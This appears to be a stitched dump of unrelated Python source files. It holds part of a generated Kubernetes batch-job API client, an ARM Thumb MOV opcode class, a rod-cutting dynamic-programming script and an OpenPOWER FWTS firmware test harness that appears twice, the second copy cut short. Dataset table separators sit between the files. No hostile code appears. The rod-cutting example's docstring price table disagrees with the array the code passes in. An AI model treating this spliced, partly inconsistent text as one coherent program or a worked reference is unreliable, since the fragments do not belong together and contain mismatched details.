"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_namespaced_job`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_namespaced_job`")
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_job_status(self, name, namespace, body, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
return data
def patch_namespaced_job_status_with_http_info(self, name, namespace, body, **kwargs):
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_namespaced_job_status`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_namespaced_job_status`")
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_job(self, name, namespace, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_namespaced_job_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_namespaced_job_with_http_info(name, namespace, **kwargs)
return data
def read_namespaced_job_with_http_info(self, name, namespace, **kwargs):
all_params = ['name', 'namespace', 'pretty', 'exact', 'export']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_namespaced_job`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'exact' in params:
query_params.append(('exact', params['exact']))
if 'export' in params:
query_params.append(('export', params['export']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_job_status(self, name, namespace, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_namespaced_job_status_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_namespaced_job_status_with_http_info(name, namespace, **kwargs)
return data
def read_namespaced_job_status_with_http_info(self, name, namespace, **kwargs):
all_params = ['name', 'namespace', 'pretty']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_namespaced_job_status`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_job(self, name, namespace, body, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.replace_namespaced_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_namespaced_job_with_http_info(name, namespace, body, **kwargs)
return data
def replace_namespaced_job_with_http_info(self, name, namespace, body, **kwargs):
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_namespaced_job`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_namespaced_job`")
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_job_status(self, name, namespace, body, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.replace_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
return data
def replace_namespaced_job_status_with_http_info(self, name, namespace, body, **kwargs):
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_namespaced_job_status`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_namespaced_job_status`")
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| true | true |
79011ddbdaf445056b62825e0177f0699d9bc6ab | 670 | py | Python | armulator/armv6/opcodes/thumb_instruction_set/thumb_instruction_set_encoding_16_bit/thumb_shift_immediate_add_subtract_move_and_compare/mov_register_thumb_t2.py | matan1008/armulator | 04d24dcec6ab42326018f5e09331e5b4738d6b52 | [
"MIT"
] | 16 | 2018-01-22T14:36:49.000Z | 2021-12-17T15:39:52.000Z | armulator/armv6/opcodes/thumb_instruction_set/thumb_instruction_set_encoding_16_bit/thumb_shift_immediate_add_subtract_move_and_compare/mov_register_thumb_t2.py | AhmedMounir/armulator | 04d24dcec6ab42326018f5e09331e5b4738d6b52 | [
"MIT"
] | 3 | 2019-02-19T17:51:47.000Z | 2022-03-31T20:45:21.000Z | armulator/armv6/opcodes/thumb_instruction_set/thumb_instruction_set_encoding_16_bit/thumb_shift_immediate_add_subtract_move_and_compare/mov_register_thumb_t2.py | AhmedMounir/armulator | 04d24dcec6ab42326018f5e09331e5b4738d6b52 | [
"MIT"
] | 4 | 2020-06-18T23:51:03.000Z | 2022-02-09T17:43:13.000Z | from armulator.armv6.opcodes.abstract_opcodes.mov_register_thumb import MovRegisterThumb
from armulator.armv6.opcodes.opcode import Opcode
class MovRegisterThumbT2(MovRegisterThumb, Opcode):
def __init__(self, instruction, m, d):
Opcode.__init__(self, instruction)
MovRegisterThumb.__init__(self, True, m, d)
def is_pc_changing_opcode(self):
return self.d == 15
@staticmethod
def from_bitarray(instr, processor):
rd = instr[13:16]
rm = instr[10:13]
if processor.in_it_block():
print "unpredictable"
else:
return MovRegisterThumbT2(instr, **{"m": rm.uint, "d": rd.uint})
| 31.904762 | 88 | 0.674627 | from armulator.armv6.opcodes.abstract_opcodes.mov_register_thumb import MovRegisterThumb
from armulator.armv6.opcodes.opcode import Opcode
class MovRegisterThumbT2(MovRegisterThumb, Opcode):
def __init__(self, instruction, m, d):
Opcode.__init__(self, instruction)
MovRegisterThumb.__init__(self, True, m, d)
def is_pc_changing_opcode(self):
return self.d == 15
@staticmethod
def from_bitarray(instr, processor):
rd = instr[13:16]
rm = instr[10:13]
if processor.in_it_block():
print "unpredictable"
else:
return MovRegisterThumbT2(instr, **{"m": rm.uint, "d": rd.uint})
| false | true |
79011fb2cfd25f3f0f3e4a25c5718c2f3a077f8a | 1,126 | py | Python | DynamicProgramming/UnBoundedKnapSack/RodCutting.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 12 | 2021-06-18T16:24:27.000Z | 2021-11-04T03:30:00.000Z | DynamicProgramming/UnBoundedKnapSack/RodCutting.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 32 | 2021-10-01T07:15:00.000Z | 2021-11-05T15:35:53.000Z | DynamicProgramming/UnBoundedKnapSack/RodCutting.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 21 | 2021-09-29T09:16:31.000Z | 2021-10-30T10:06:21.000Z | """
Given a rod of length n inches and an array of prices
that includes prices of all pieces of size smaller than n.
Determine the maximum value obtainable by cutting up the rod and
selling the pieces. For example, if the length of the rod is 8
and the values of different pieces are given as the following,
then the maximum obtainable value is 22 (by cutting in two pieces of lengths 2 and 6)
length | 1 2 3 4 5 6 7 8
--------------------------------------------
price | 1 5 8 9 10 17 17 20
In unbounded knapsack their is only one change compared to 0/1 knapsack i.e
****dp[i][j-wt[n-1]]****
wt arr => len arr
val arr => price arr
W => L
"""
def RodCutting(larr, parr, L):
n = len(larr)
dp = [[0 for j in range(L+1)]for i in range(n+1)]
for i in range(1, n+1):
for j in range(1, L+1):
if larr[i-1] <= j:
dp[i][j] = max(parr[i-1]+dp[i][j-larr[i-1]], dp[i-1][j])
else:
dp[i][j] = dp[i-1][j]
print(dp)
return dp[n][L]
print(RodCutting([1, 2, 3, 4, 5, 6, 7, 8], [9, 5, 8, 9, 10, 17, 17, 20], 8))
| 27.463415 | 86 | 0.55595 |
def RodCutting(larr, parr, L):
n = len(larr)
dp = [[0 for j in range(L+1)]for i in range(n+1)]
for i in range(1, n+1):
for j in range(1, L+1):
if larr[i-1] <= j:
dp[i][j] = max(parr[i-1]+dp[i][j-larr[i-1]], dp[i-1][j])
else:
dp[i][j] = dp[i-1][j]
print(dp)
return dp[n][L]
print(RodCutting([1, 2, 3, 4, 5, 6, 7, 8], [9, 5, 8, 9, 10, 17, 17, 20], 8))
| true | true |
7901200b85e3ad1e3f075a40d541414a1b210b81 | 10,122 | py | Python | testcases/FWTS.py | jk-ozlabs/op-test-framework | 363165fa274f86243e7b924918bebf2325a7a8b2 | [
"Apache-2.0"
] | null | null | null | testcases/FWTS.py | jk-ozlabs/op-test-framework | 363165fa274f86243e7b924918bebf2325a7a8b2 | [
"Apache-2.0"
] | null | null | null | testcases/FWTS.py | jk-ozlabs/op-test-framework | 363165fa274f86243e7b924918bebf2325a7a8b2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
# OpenPOWER Automated Test Project
#
# Contributors Listed Below - COPYRIGHT 2015,2017
# [+] International Business Machines Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
# This test runs FWTS and munges the JSON report output into
# python unittest.TestCase objects, so we get the individual
# failure/successes into the TestResult output (e.g. junit XML)
import time
import subprocess
import re
import sys
import os
import OpTestConfiguration
import unittest
from common.OpTestSystem import OpSystemState
from common.Exceptions import CommandFailed
import json
class FWTSCommandFailed(unittest.TestCase):
FAIL = None
def runTest(self):
self.assertEqual(self.FAIL, None, str(self.FAIL))
class FWTSVersion(unittest.TestCase):
MAJOR = None
MINOR = None
def version_check(self):
if self.MAJOR is None and self.MINOR is None:
self.skipTest("Test not meant to be run this way.")
return (self.MAJOR == 17 and self.MINOR >=1) or self.MAJOR > 17
def runTest(self):
self.assertTrue(self.version_check(),
'FWTS must be at least Version 17.01'
)
class FWTSTest(unittest.TestCase):
SUBTEST_RESULT = None
CENTAURS_PRESENT = True
IS_FSP_SYSTEM = False
FWTS_MAJOR_VERSION = None
FWTS_MINOR_VERSION = None
def runTest(self):
if self.SUBTEST_RESULT is None:
self.skipTest("Test not meant to be run this way.")
if self.SUBTEST_RESULT.get('log_text') == 'dtc reports warnings from device tree:Warning (reg_format): "reg" property in /ibm,opal/flash@0 has invalid length (8 bytes) (#address-cells == 0, #size-cells == 0)\n':
self.skipTest('/ibm,opal/flash@0 known warning')
# Some FWTS verions barfed (incorrectly) on missing nodes
# in the device tree. If we spot this, skip the test
# this work-around should be removed when the FWTS version readily
# available from the archives no longer has this problem
if not (self.SUBTEST_RESULT.get('failure_label') == 'None'):
log_text = self.SUBTEST_RESULT.get('log_text')
if re.match('Property of "(status|manufacturer-id|part-number|serial-number)" for "/sys/firmware/devicetree/base/memory-buffer' , log_text):
self.skipTest("FWTS bug: Incorrect Missing '(status|manufacturer-id|part-number|serial-number)' property in memory-buffer/dimm");
if re.match('property "serial-number" contains unprintable characters', log_text):
self.skipTest("FWTS bug: DIMM VPD has binary serial number")
if self.FWTS_MAJOR_VERSION <= 18:
# This is a guess based on when
# https://lists.ubuntu.com/archives/fwts-devel/2018-April/010318.html
# will be merged
if self.FWTS_MAJOR_VERSION < 18 or self.FWTS_MINOR_VERSION < 5:
if re.match('CPUFreqClaimedMax', self.SUBTEST_RESULT.get('failure_label')):
self.skipTest("Bug in FWTS r.e. boost frequencies, fixed sometime after April 2018")
# On FSP machines, memory-buffers (centaurs) aren't present in DT
# and FWTS 17.03 (at least) expects them to be, so skip those failures
if not self.CENTAURS_PRESENT and re.match('No MEM devices \(memory-buffer', log_text):
self.skipTest("FWTS assumes Centaurs present on FSP systems")
if self.IS_FSP_SYSTEM and re.match('Property of "(board-info|part-number|serial-number|vendor|ibm,slot-location-code)" for "/sys/firmware/devicetree/base/xscom@.*" was not able to be retrieved. Check the installation for the CPU device config for missing nodes in the device tree if you expect CPU devices', log_text):
self.skipTest("FWTS assumes some nodes present on FSP systems which aren't")
if re.match('Attempt was made to stop the opal-prd.service but was not successful', log_text):
self.skipTest("FWTS bug: prd did actually stop, and there's something strange with FWTS")
if re.match('OPAL "/ibm,firmware-versions" firmware version from device tree node "open-power" was not found', log_text):
self.skipTest("FWTS known issue: 'open-power' version no longer required")
# We currently guess that all these are going to be merged for FWTS 18.05 :)
# To be extra cautious, allowing them to fail for all of 18.XX though
if self.FWTS_MAJOR_VERSION <= 18:
if re.match('CPUPstateLimitsTestFail', self.SUBTEST_RESULT.get('failure_label')):
self.skipTest("FWTS known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010315.html")
if re.match('DeviceTreeBaseDTCWarnings', self.SUBTEST_RESULT.get('failure_label')):
self.skipTest("FWTS known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010326.html")
if re.match('Property of "(board-info|vendor|ibm,slot-location-code)" for "/sys/firmware/devicetree/base/xscom.*" was not able to be retrieved. Check the installation for the CPU device config for missing nodes in the device tree if you expect CPU devices.', log_text):
self.skipTest("FWTS/firmware known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010329.html")
if re.match('No MEM DIMM devices \(memory-buffer\) were found in "/sys/firmware/devicetree/base" with a status of "okay" or "ok". This is unexpected so please check your system setup for issues.', log_text):
self.skipTest("FWTS/firmware known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010330.html")
self.assertEqual(self.SUBTEST_RESULT.get('failure_label'), 'None', self.SUBTEST_RESULT)
class FWTS(unittest.TestSuite):
def add_fwts_results(self, major_version, minor_version):
host = self.cv_HOST
try:
fwtsjson = host.host_run_command('fwts -q -r stdout --log-type=json')
except CommandFailed as cf:
# FWTS will have exit code of 1 if any test fails,
# we want to ignore that and parse the output.
fwtsjson = cf.output
if cf.exitcode not in [0, 1]:
command_failed = FWTSCommandFailed()
command_failed.FAIL = cf
self.real_fwts_suite.addTest(command_failed)
r = json.loads('\n'.join(fwtsjson), encoding='latin-1')
tests = []
for fwts in r['fwts']:
for k in fwts:
if k == "tests":
tests = fwts[k]
for test_container in tests:
for tr in test_container:
js_suite = test_container[tr][0]
js_subtests = test_container[tr][1]
suite = unittest.TestSuite()
for sts in js_subtests:
if sts == "subtests":
for subtest in js_subtests[sts]:
for st_info in subtest['subtest']:
if not st_info.get('subtest_results'):
continue
for st_result in st_info.get('subtest_results'):
t = FWTSTest()
t.SUBTEST_RESULT = st_result
t.CENTAURS_PRESENT = self.centaurs_present
t.FWTS_MAJOR_VERSION = major_version
t.FWTS_MINOR_VERSION = minor_version
if self.bmc_type == 'FSP':
t.IS_FSP_SYSTEM = True
suite.addTest(t)
self.real_fwts_suite.addTest(suite)
def run(self, result):
conf = OpTestConfiguration.conf
self.cv_HOST = conf.host()
self.cv_SYSTEM = conf.system()
self.bmc_type = conf.args.bmc_type
self.real_fwts_suite = unittest.TestSuite()
try:
self.cv_SYSTEM.goto_state(OpSystemState.OS)
except Exception as e:
# In the event of something going wrong during IPL,
# We need to catch that here as we're abusing UnitTest
# TestSuite infra and we don't have the catch-all that
# a TestCase provides.
f = FWTSCommandFailed()
f.FAIL = e
self.real_fwts_suite.addTest(f)
self.real_fwts_suite.run(result)
return
self.centaurs_present = self.cv_SYSTEM.has_centaurs_in_dt()
host = self.cv_HOST
fwts_version = None
try:
fwts_version = host.host_run_command('fwts --version')
except CommandFailed as cf:
command_failed = FWTSCommandFailed()
command_failed.FAIL = cf
self.real_fwts_suite.addTest(command_failed)
if fwts_version:
# We want to ensure we're at least at version 17.01
# which means we need to parse this:
# fwts, Version V17.01.00, 2017-01-19 04:20:38
v = re.search("fwts, Version V(\d+)\.(\d+)", ''.join(fwts_version))
major , minor = v.group(1) , v.group(2)
checkver = FWTSVersion()
checkver.MAJOR = major
checkver.MINOR = minor
self.real_fwts_suite.addTest(checkver)
if checkver.version_check():
self.add_fwts_results(int(major),int(minor))
self.real_fwts_suite.run(result)
| 49.617647 | 330 | 0.625766 |
import time
import subprocess
import re
import sys
import os
import OpTestConfiguration
import unittest
from common.OpTestSystem import OpSystemState
from common.Exceptions import CommandFailed
import json
class FWTSCommandFailed(unittest.TestCase):
FAIL = None
def runTest(self):
self.assertEqual(self.FAIL, None, str(self.FAIL))
class FWTSVersion(unittest.TestCase):
MAJOR = None
MINOR = None
def version_check(self):
if self.MAJOR is None and self.MINOR is None:
self.skipTest("Test not meant to be run this way.")
return (self.MAJOR == 17 and self.MINOR >=1) or self.MAJOR > 17
def runTest(self):
self.assertTrue(self.version_check(),
'FWTS must be at least Version 17.01'
)
class FWTSTest(unittest.TestCase):
    """Wraps a single FWTS subtest result, skipping known FWTS/firmware issues."""

    # Dict holding one subtest result out of the FWTS JSON report.
    SUBTEST_RESULT = None
    # Whether Centaur memory buffers are present in the device tree.
    CENTAURS_PRESENT = True
    IS_FSP_SYSTEM = False
    # FWTS version (ints); used to skip failures fixed in later releases.
    FWTS_MAJOR_VERSION = None
    FWTS_MINOR_VERSION = None

    def runTest(self):
        if self.SUBTEST_RESULT is None:
            self.skipTest("Test not meant to be run this way.")
        # Bug fix: bind log_text up front. It used to be assigned only inside
        # the failure branch below, but the generic checks further down
        # reference it for every subtest, raising NameError on passing ones.
        log_text = self.SUBTEST_RESULT.get('log_text')
        if log_text == 'dtc reports warnings from device tree:Warning (reg_format): "reg" property in /ibm,opal/flash@0 has invalid length (8 bytes) (#address-cells == 0, #size-cells == 0)\n':
            self.skipTest('/ibm,opal/flash@0 known warning')
        if not (self.SUBTEST_RESULT.get('failure_label') == 'None'):
            if re.match('Property of "(status|manufacturer-id|part-number|serial-number)" for "/sys/firmware/devicetree/base/memory-buffer', log_text):
                self.skipTest("FWTS bug: Incorrect Missing '(status|manufacturer-id|part-number|serial-number)' property in memory-buffer/dimm")
            if re.match('property "serial-number" contains unprintable characters', log_text):
                self.skipTest("FWTS bug: DIMM VPD has binary serial number")
            if self.FWTS_MAJOR_VERSION <= 18:
                # This is a guess based on when
                # https://lists.ubuntu.com/archives/fwts-devel/2018-April/010318.html
                # will be merged
                if self.FWTS_MAJOR_VERSION < 18 or self.FWTS_MINOR_VERSION < 5:
                    if re.match('CPUFreqClaimedMax', self.SUBTEST_RESULT.get('failure_label')):
                        self.skipTest("Bug in FWTS r.e. boost frequencies, fixed sometime after April 2018")
            # On FSP machines, memory-buffers (centaurs) aren't present in DT
            # and FWTS 17.03 (at least) expects them to be, so skip those failures
            if not self.CENTAURS_PRESENT and re.match(r'No MEM devices \(memory-buffer', log_text):
                self.skipTest("FWTS assumes Centaurs present on FSP systems")
            if self.IS_FSP_SYSTEM and re.match('Property of "(board-info|part-number|serial-number|vendor|ibm,slot-location-code)" for "/sys/firmware/devicetree/base/xscom@.*" was not able to be retrieved. Check the installation for the CPU device config for missing nodes in the device tree if you expect CPU devices', log_text):
                self.skipTest("FWTS assumes some nodes present on FSP systems which aren't")
        if re.match('Attempt was made to stop the opal-prd.service but was not successful', log_text):
            self.skipTest("FWTS bug: prd did actually stop, and there's something strange with FWTS")
        if re.match('OPAL "/ibm,firmware-versions" firmware version from device tree node "open-power" was not found', log_text):
            self.skipTest("FWTS known issue: 'open-power' version no longer required")
        # We currently guess that all these are going to be merged for FWTS 18.05 :)
        # To be extra cautious, allowing them to fail for all of 18.XX though
        if self.FWTS_MAJOR_VERSION <= 18:
            if re.match('CPUPstateLimitsTestFail', self.SUBTEST_RESULT.get('failure_label')):
                self.skipTest("FWTS known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010315.html")
            if re.match('DeviceTreeBaseDTCWarnings', self.SUBTEST_RESULT.get('failure_label')):
                self.skipTest("FWTS known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010326.html")
            if re.match('Property of "(board-info|vendor|ibm,slot-location-code)" for "/sys/firmware/devicetree/base/xscom.*" was not able to be retrieved. Check the installation for the CPU device config for missing nodes in the device tree if you expect CPU devices.', log_text):
                self.skipTest("FWTS/firmware known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010329.html")
            if re.match(r'No MEM DIMM devices \(memory-buffer\) were found in "/sys/firmware/devicetree/base" with a status of "okay" or "ok". This is unexpected so please check your system setup for issues.', log_text):
                self.skipTest("FWTS/firmware known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010330.html")
        self.assertEqual(self.SUBTEST_RESULT.get('failure_label'), 'None', self.SUBTEST_RESULT)
class FWTS(unittest.TestSuite):
    """Dynamically builds a TestSuite out of the subtest results of a FWTS run."""

    def add_fwts_results(self, major_version, minor_version):
        """Run FWTS on the host and add one FWTSTest per subtest result.

        :param major_version: FWTS major version (int), forwarded to each
            test so version-specific known issues can be skipped.
        :param minor_version: FWTS minor version (int).
        """
        host = self.cv_HOST
        try:
            fwtsjson = host.host_run_command('fwts -q -r stdout --log-type=json')
        except CommandFailed as cf:
            # FWTS will have exit code of 1 if any test fails,
            # we want to ignore that and parse the output.
            fwtsjson = cf.output
            if cf.exitcode not in [0, 1]:
                command_failed = FWTSCommandFailed()
                command_failed.FAIL = cf
                self.real_fwts_suite.addTest(command_failed)
        # Bug fix: json.loads() no longer accepts an `encoding` keyword on
        # Python 3.9+ (it was ignored for str input anyway).
        r = json.loads('\n'.join(fwtsjson))
        tests = []
        for fwts in r['fwts']:
            for k in fwts:
                if k == "tests":
                    tests = fwts[k]
        for test_container in tests:
            for tr in test_container:
                js_suite = test_container[tr][0]
                js_subtests = test_container[tr][1]
                suite = unittest.TestSuite()
                for sts in js_subtests:
                    if sts == "subtests":
                        for subtest in js_subtests[sts]:
                            for st_info in subtest['subtest']:
                                if not st_info.get('subtest_results'):
                                    continue
                                for st_result in st_info.get('subtest_results'):
                                    t = FWTSTest()
                                    t.SUBTEST_RESULT = st_result
                                    t.CENTAURS_PRESENT = self.centaurs_present
                                    t.FWTS_MAJOR_VERSION = major_version
                                    t.FWTS_MINOR_VERSION = minor_version
                                    if self.bmc_type == 'FSP':
                                        t.IS_FSP_SYSTEM = True
                                    suite.addTest(t)
                self.real_fwts_suite.addTest(suite)

    def run(self, result):
        """Boot the machine to the OS, check the FWTS install, run the suite."""
        conf = OpTestConfiguration.conf
